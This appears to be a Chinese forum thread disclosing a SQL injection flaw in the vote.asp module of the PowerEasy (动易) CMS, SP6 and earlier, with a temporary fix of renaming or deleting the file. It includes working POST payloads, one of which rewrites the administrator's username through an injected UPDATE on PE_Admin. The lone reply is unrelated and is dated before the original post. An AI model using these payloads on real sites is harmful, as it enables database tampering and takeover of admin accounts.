服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 5607|回复: 1

最新动易<=SP6 Vote.asp 注入漏洞

[复制链接]
dirtysea 发表于 2007-11-9 16:58:57 | 显示全部楼层 |阅读模式
漏洞:动易<=SP6 Vote.asp 注入漏洞

影响版本:<=SP6

漏洞分析:

在动易系统的投票模块(vote.asp)使用了如下语句:

Update PE_Vote set answer" & VoteOption   & "= answer" & VoteOption & "+1 where ID=" & ID

在VoteType不等于single的情况下,VoteOption变量过滤失效,导致入侵者恶意构造VoteOption变量通过post提交,注入数据库,篡改或获取数据库内容

此漏洞对SQL影响较大,对ACCESS版本影响甚微。

测试攻击代码:

VoteOption=1=user-/-&VoteType=Multi&Action=Vote&ID=3

VoteOption参数注入(其他的参数就没看了)
他们先过滤了"--"再过滤";"

测试方法:
VoteOption的值为1=1 update PE_Admin set adminname=0x61-;-时,修改管理员的用户名。

临时解决方案:

在动易官方未发布补丁之前,可以改名或删除vote.asp
chewang 发表于 2006-6-5 04:33:02 | 显示全部楼层

re:最新动易<=SP6 Vote.asp 注入漏洞

世上没有什么再比男女之间的感情再复杂了,没有人能够像给数学一样给它下个定义!!!!


人要在挫折中学会坚强,过去的一切只能用时间去淹没,没有爱又哪来的恨呢?


 

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-4-18 09:33 , Processed in 0.135383 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表